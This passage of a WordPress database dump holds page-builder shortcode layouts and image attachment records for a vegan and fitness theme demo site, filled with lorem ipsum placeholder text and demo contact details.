\n[/vc_column_text][vc_empty_space height=\"60px\"][qodef_countdown skin=\"qodef-light-skin\" year=\"2018\" month=\"11\" day=\"14\" hour=\"16\" minute=\"15\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','Coming Soon','','publish','closed','closed','','coming-soon','','','2018-01-19 15:28:04','2018-01-19 15:28:04','',0,'http://succulents.select-themes.com/?page_id=192',0,'page','',0),(194,1,'2018-01-19 15:28:44','2018-01-19 15:28:44','','comming-soon','','inherit','open','closed','','comming-soon','','','2018-01-19 15:28:44','2018-01-19 15:28:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/comming-soon.jpg',0,'attachment','image/jpeg',0),(230,1,'2018-01-22 09:08:17','2018-01-22 09:08:17','[vc_row row_content_width=\"grid\" parallax_background_image=\"2981\"][vc_column][qodef_elements_holder holder_full_height=\"yes\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"140px 51% 158px 0px\" item_padding_680=\"61px 0% 104px 0px\" item_padding_680_768=\"58px 20% 106px 0px\" item_padding_768_1024=\"110px 27% 154px 0px\"][qodef_custom_font title_tag=\"\" font_weight=\"700\" subtitle_font_weight=\"300\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"Contact Us\" subtitle=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ali quam a tincidunt nisi, pellentesque eleifend.\" font_family=\"Quicksand \" font_size=\"65px\" subtitle_color=\"#ffffff\" color=\"#ffffff\" subtitle_font_size=\"20px\" subtitle_line_height=\"27px\" letter_spacing=\"4px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519212365937{padding-top: 118px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Fitness Lifestyle\"][vc_empty_space height=\"52px\"][qodef_google_map custom_map_style=\"yes\" address1=\"New York\" map_height=\"354px\" zoom=\"12\" color_overlay=\"#000000\" lightness=\"20\" pin=\"541\"][vc_empty_space height=\"67px\"][qodef_single_image enable_image_shadow=\"no\" image=\"566\" image_size=\"full\"][vc_column_text]\n

Succulets is simply dummy text of the printing and

\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715206030{margin-top: -7px !important;}\"]\n

typesetting industry lorem ipsum lorem dummy text of the

\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715198974{margin-top: -7px !important;}\"]\n

printing lovely fonts and lovely.

\n[/vc_column_text][vc_empty_space height=\" 33px\"][vc_column_text]\n
Email us: succulents@select-themes.com
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715078902{margin-top: -10px !important;}\"]\n
Phone us: 0408 266 7759
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715086438{margin-top: -10px !important;}\"]\n
Visit us: 20 South Summer Street, US
\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519212398057{padding-top: 30px !important;padding-bottom: 109px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"261\" image_size=\"full\"][/vc_column][/vc_row]','Contact Us','','publish','closed','closed','','contact-us','','','2018-01-22 09:08:17','2018-01-22 09:08:17','',0,'http://succulents.select-themes.com/?page_id=230',0,'page','',0),(245,1,'2018-01-22 09:22:42','2018-01-22 09:22:42','','h1-img15','','inherit','open','closed','','h1-img15','','','2018-01-22 09:22:42','2018-01-22 09:22:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img15.jpg',0,'attachment','image/jpeg',0),(246,1,'2018-01-22 09:23:23','2018-01-22 09:23:23','','h1-img-16','','inherit','open','closed','','h1-img-16','','','2018-01-22 09:23:23','2018-01-22 09:23:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img-16.jpg',0,'attachment','image/jpeg',0),(261,1,'2018-01-22 09:37:18','2018-01-22 09:37:18','','signature-contact','','inherit','open','closed','','signature-contact','','','2018-01-22 09:37:18','2018-01-22 09:37:18','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/signature-contact.png',0,'attachment','image/png',0),(281,1,'2018-01-22 10:39:34','2018-01-22 10:39:34','[vc_row row_content_width=\"grid\" parallax_background_image=\"2988\" parallax_bg_height=\"461px\"][vc_column][qodef_elements_holder holder_full_height=\"yes\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"140px 43% 158px 24px\" item_padding_680_768=\"107px 0% 154px 0px\" item_padding_680=\"78px 0% 113px 0px \" item_padding_768_1024=\"110px 39% 154px 0px\"][qodef_custom_font title_tag=\"\" font_weight=\"700\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"Pricing Plans\" font_family=\"Quicksand (OTT)\" font_size=\"72px\" line_height=\"72px\" color=\"#ffffff\" subtitle=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi, pellentesque eleifend.\" subtitle_font_size=\"20px\" subtitle_line_height=\"27px\" subtitle_color=\"#ffffff\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" disable_background_image=\"\" content_text_aligment=\"center\" css=\".vc_custom_1520337627128{padding-top: 118px !important;padding-bottom: 225px !important;}\" simple_background_image=\"289\"][vc_column][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Fitnes Lifestyle\"][vc_empty_space height=\"52px\"][qodef_pricing_table columns=\"qodef-three-columns\" space_between_items=\"normal\"][qodef_pricing_table_item title=\"Premium\" button_text=\"view more\" button_type=\"solid\" price=\"58\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Standard\" button_text=\"view more\" button_type=\"solid\" price=\"72\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Platinum\" button_text=\"view more\" button_type=\"solid\" price=\"72\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][/qodef_pricing_table][/vc_column][/vc_row][vc_row row_content_width=\"grid\" simple_background_color=\"#ffebe4\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"34px 0px 0px 12px\" item_padding_1024_1280=\"61px 0px 0px 12px\" item_padding_768_1024=\"104px 0px 0px 0px\" item_padding_680=\"62px 0px 0px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"3295\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"96px 89px 96px 0px\" item_padding_1280_1600=\"86px 79px 96px 0px\" item_padding_1024_1280=\"86px 96px 96px 0px\" item_padding_680_768=\"48px 0px 100px 0px\" item_padding_680=\"50px 0px 100px 0px\" item_padding_768_1024=\"96px 0px 96px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"308\"][vc_empty_space height=\"5px\"][vc_column_text]Lorem ipsum dolor sit amet, id vis elit voluptatibus, adhuc atqui clita est no, ex vis autem assentior. Noluisse suscipit eleifend cu mel. Vix no placerat repudiandae, nostrud consequuntur volu.[/vc_column_text][vc_empty_space height=\"30px\"][qodef_button text=\"my story\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519314929766{padding-top: 93px !important;padding-bottom: 81px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"343\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" text_top_margin=\"15px\"][vc_empty_space][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"3274\" title=\"Strong Exercise\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" text_top_margin=\"15px\"][vc_empty_space][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"3276\" title=\"Deep Hidration\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" text_top_margin=\"15px\"][vc_empty_space][/vc_column][/vc_row]','Pricing Plans','','publish','closed','closed','','pricing-plans','','','2018-01-22 10:39:34','2018-01-22 10:39:34','',0,'http://succulents.select-themes.com/?page_id=281',0,'page','',0),(289,1,'2018-01-22 10:42:46','2018-01-22 10:42:46','','pricing-img-1','','inherit','open','closed','','pricing-img-1','','','2018-01-22 10:42:46','2018-01-22 10:42:46','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/pricing-img-1.jpg',0,'attachment','image/jpeg',0),(291,1,'2018-01-22 10:45:23','2018-01-22 10:45:23','','h1-img9','','inherit','open','closed','','h1-img9','','','2018-01-22 10:45:23','2018-01-22 10:45:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img9.png',0,'attachment','image/png',0),(308,1,'2018-01-22 10:52:32','2018-01-22 10:52:32','','pricing-img-3','','inherit','open','closed','','pricing-img-3','','','2018-01-22 10:52:32','2018-01-22 10:52:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/pricing-img-3.png',0,'attachment','image/png',0),(343,1,'2018-01-22 11:31:19','2018-01-22 11:31:19','','pricing-img-4','','inherit','open','closed','','pricing-img-4','','','2018-01-22 11:31:19','2018-01-22 11:31:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/pricing-img-4.png',0,'attachment','image/png',0),(347,1,'2018-01-22 12:39:19','2018-01-22 12:39:19','[vc_row simple_background_color=\"#ecb6b4\"][vc_column][rev_slider alias=\"home2\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519035796237{padding-top: 85px !important;padding-bottom: 20px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"20px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Vegan Breakfast\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1520234035796{padding-top: 23px !important;padding-bottom: 80px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image_size=\"full\" image=\"2508\" title=\"Oat & Blueberry Bowl \" text=\"Sit vocibus antiopam complectitur eu, an ullum civibus cum. Homero verear tincidunt ei mei, usu et quis facer. Ea sed antiopam explicari.\"][vc_empty_space][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image_size=\"full\" image=\"2509\" title=\"Acai & Kiwi Bowl\" text=\"Sit vocibus antiopam complectitur eu, an ullum civibus cum. Homero verear tincidunt ei mei, usu et quis facer. Ea sed antiopam explicari.\"][vc_empty_space][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image_size=\"full\" image=\"2510\" title=\"Kiwi & Hemp Bowl\" text=\"Sit vocibus antiopam complectitur eu, an ullum civibus cum. Homero verear tincidunt ei mei, usu et quis facer. Ea sed antiopam explicari.\"][vc_empty_space][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"369\" css=\".vc_custom_1518177180547{padding-top: 35px !important;padding-bottom: 115px !important;}\"][vc_column][qodef_testimonials skin=\"light\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1518010784961{padding-top: 76px !important;}\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding_680_768=\"371px 0 173px 0\" item_padding_768_1024=\"71% 0px 100px 0px\" item_padding_680=\"388px 0px 10px 0px\" background_image=\"385\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"54px 0 130px 17px\" item_padding_680=\"50px 0px 100px 0px\" item_padding_680_768=\"66px 0px 100px 0px\" item_padding_768_1024=\"74px 0px 100px 0px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Spare an Animal, Eat Like a Vegan\"][vc_empty_space height=\"13px\"][vc_column_text]Sit vocibus antiopam complectitur eu, an ullum civibus cum. Homero verear tincidunt ei mei, usu et quis facer. Ea sed antiopam explicari scriptorem. Et aliquip aperiri mei, cu mea quem ceteros.[/vc_column_text][vc_empty_space height=\"27px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" simple_background_color=\"#fafafa\" css=\".vc_custom_1519737893175{padding-top: 85px !important;padding-bottom: 66px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"20px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"You Have a Choice\"][/vc_column][/vc_row][vc_row simple_background_color=\"#fafafa\" css=\".vc_custom_1520432291431{padding-top: 30px !important;padding-bottom: 105px !important;}\"][vc_column][qodef_image_gallery type=\"carousel\" enable_image_shadow=\"no\" image_behavior=\"lightbox\" space_between_items=\"normal\" number_of_visible_items=\"4\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_auto_width=\"yes\" enable-center=\"no\" slider_navigation=\"no\" slider_pagination=\"yes\" slider_pagination_skin=\"\" image_size=\"full\" images=\"394,395,396,397,398\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"43px 0px 48px 0px\" item_padding_768_1024=\"100px 0px 0px 0px\" item_padding_680=\"100px 0px 20px 0px\" item_padding_680_768=\"100px 38px 0px 0px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"This is Just Veganning\"][vc_empty_space height=\"13px\"][vc_column_text]Sit vocibus antiopam complectitur eu, an ullum civibus cum. Homero verear tincidunt ei mei, usu et quis facer. Ea sed antiopam explicari scriptorem. Et aliquip aperiri mei, cu mea quem ceteros.[/vc_column_text][vc_empty_space height=\"27px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"122px 10px 114px 10px\" item_padding_768_1024=\"76px 0px 100px 114px\" item_padding_680=\"54px 0px 100px 0px\" item_padding_680_768=\"50px 0px 100px 26px\"][qodef_single_image enable_image_shadow=\"no\" image=\"404\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"408\" css=\".vc_custom_1519139742242{padding-top: 123px !important;padding-bottom: 80px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h4\" custom_icon=\"409\" title=\"35%\" text=\"food chain\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h4\" custom_icon=\"429\" title=\"51%\" text=\"saved animals\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h4\" custom_icon=\"431\" title=\"67%\" text=\"recycling\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h4\" custom_icon=\"432\" title=\"91%\" text=\"production\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519139675386{padding-top: 83px !important;padding-bottom: 22px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"20px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Vegan Blogging\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519139603635{padding-top: 40px !important;padding-bottom: 63px !important;}\"][vc_column][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"small\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"organic\" excerpt_length=\"19\"][/vc_column][/vc_row]','Vegan Home','','publish','closed','closed','','vegan-home','','','2018-01-22 12:39:19','2018-01-22 12:39:19','',0,'http://succulents.select-themes.com/?page_id=347',0,'page','',0),(352,1,'2018-01-22 12:41:32','2018-01-22 12:41:32','','pricing-img-2','','inherit','open','closed','','pricing-img-2','','','2018-01-22 12:41:32','2018-01-22 12:41:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/pricing-img-2.jpg',0,'attachment','image/jpeg',0),(369,1,'2018-01-22 12:59:07','2018-01-22 12:59:07','','h2-img-4','','inherit','open','closed','','h2-img-4','','','2018-01-22 12:59:07','2018-01-22 12:59:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-4.jpg',0,'attachment','image/jpeg',0),(378,1,'2018-01-22 13:18:08','2018-01-22 13:18:08','[vc_row css=\".vc_custom_1517828680323{padding-bottom: 21px !important;}\"][vc_column][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.[/vc_column_text][vc_column_text]\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit ultrices diam non dictum. Aliquam tempus quis erat nec malesuada. Cras placerat leo vitae nisl auctor, nec volutpat libero lacinia. Nulla vel malesuada nibh. Donec et est erat.
\n[/vc_column_text][/vc_column][/vc_row]','Maria Yong','At his justo aperiri, id liber suavi tate tincidunt vel urum diam nec. ','publish','open','closed','','maria-yong','','','2018-01-22 13:18:08','2018-01-22 13:18:08','',0,'http://succulents.select-themes.com/?post_type=team-member&p=378',0,'team-member','',0),(385,1,'2018-01-22 13:38:14','2018-01-22 13:38:14','','h2-img-5','','inherit','open','closed','','h2-img-5','','','2018-01-22 13:38:14','2018-01-22 13:38:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-5.jpg',0,'attachment','image/jpeg',0),(390,1,'2020-04-11 16:26:47','2020-04-11 16:26:47','','book-advert-for-new-web-small','','inherit','open','closed','','book-advert-for-new-web-small','','','2020-04-11 16:27:22','2020-04-11 16:27:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/book-advert-for-new-web-small.jpg',0,'attachment','image/jpeg',0),(393,1,'2018-01-22 14:35:42','2018-01-22 14:35:42','','team-img-1','','inherit','open','closed','','team-img-1','','','2018-01-22 14:35:42','2018-01-22 14:35:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/team-img-1.jpg',0,'attachment','image/jpeg',0),(394,1,'2018-01-22 14:41:19','2018-01-22 14:41:19','','h2-img-6','','inherit','open','closed','','h2-img-6','','','2018-01-22 14:41:19','2018-01-22 14:41:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-6.jpg',0,'attachment','image/jpeg',0),(395,1,'2018-01-22 14:41:21','2018-01-22 14:41:21','','h2-img-7','','inherit','open','closed','','h2-img-7','','','2018-01-22 14:41:21','2018-01-22 14:41:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-7.jpg',0,'attachment','image/jpeg',0),(396,1,'2018-01-22 14:41:23','2018-01-22 14:41:23','','h2-img-8','','inherit','open','closed','','h2-img-8','','','2018-01-22 14:41:23','2018-01-22 14:41:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-8.jpg',0,'attachment','image/jpeg',0),(397,1,'2018-01-22 14:41:24','2018-01-22 14:41:24','','h2-img-9','','inherit','open','closed','','h2-img-9','','','2018-01-22 14:41:24','2018-01-22 14:41:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-9.jpg',0,'attachment','image/jpeg',0),(398,1,'2018-01-22 14:41:25','2018-01-22 14:41:25','','h2-img-10','','inherit','open','closed','','h2-img-10','','','2018-01-22 14:41:25','2018-01-22 14:41:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-10.jpg',0,'attachment','image/jpeg',0),(404,1,'2018-01-22 15:05:28','2018-01-22 15:05:28','','h2-img-11','','inherit','open','closed','','h2-img-11','','','2018-01-22 15:05:28','2018-01-22 15:05:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-11.png',0,'attachment','image/png',0),(406,1,'2018-01-22 15:21:13','2018-01-22 15:21:13','[vc_row row_content_width=\"grid\" disable_background_image=\"\" simple_background_image=\"410\" parallax_background_image=\"2992\" parallax_bg_height=\"461px\"][vc_column][qodef_elements_holder holder_full_height=\"yes\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"132px 50% 154px 5px\" item_padding_680=\"62px 0 110px 0px\" item_padding_680_768=\"112px 0% 154px 0px\" item_padding_768_1024=\"110px 29% 149px 0px\"][qodef_custom_font title_tag=\"\" font_weight=\"700\" subtitle_font_weight=\"300\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"What We Offer\" subtitle=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ali quam a tincidunt nisi, pellentesque eleifend.\" font_family=\"Quicksand \" font_size=\"65px\" subtitle_color=\"#ffffff\" color=\"#ffffff\" subtitle_font_size=\"20px\" subtitle_line_height=\"27px\" letter_spacing=\"4px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519212907688{padding-top: 120px !important;padding-bottom: 40px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-drop\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" icon_color=\"#ffffff\" icon_background_color=\"#ffbea5\" shape_size=\"57\" custom_icon_size=\"20\" title_top_margin=\"0px\"][vc_empty_space height=\"70px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-paw\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" icon_color=\"#ffffff\" shape_size=\"57\" icon_background_color=\"#ffbea5\" custom_icon_size=\"22\" title_top_margin=\"0px\"][vc_empty_space height=\"70px\"][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-heart\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" icon_color=\"#ffffff\" shape_size=\"57\" icon_background_color=\"#ffbea5\" custom_icon_size=\"20\" title_top_margin=\"0px\"][vc_empty_space height=\"67px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-earth\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" icon_color=\"#ffffff\" shape_size=\"57\" icon_background_color=\"#ffbea5\" custom_icon_size=\"20\" title_top_margin=\"0px\"][vc_empty_space height=\"70px\"][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-bookmark\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of.\" icon_color=\"#ffffff\" icon_background_color=\"#ffbea5\" shape_size=\"57\" custom_icon_size=\"20\" title_top_margin=\"0px\"][vc_empty_space height=\"70px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"linear_icons\" linear_icon=\"lnr-star\" icon_type=\"qodef-circle\" icon_size=\"qodef-icon-small\" title_tag=\"h3\" title=\"Detox diet\" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of. \" icon_color=\"#ffffff\" shape_size=\"57\" icon_background_color=\"#ffbea5\" custom_icon_size=\"20\" title_top_margin=\"0px\"][vc_empty_space height=\"70px\"][/vc_column][/vc_row][vc_row parallax_background_image=\"1827\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"141px 0 176px 41.5%\" item_padding_680=\"100px 53px 50px 11.5%\" 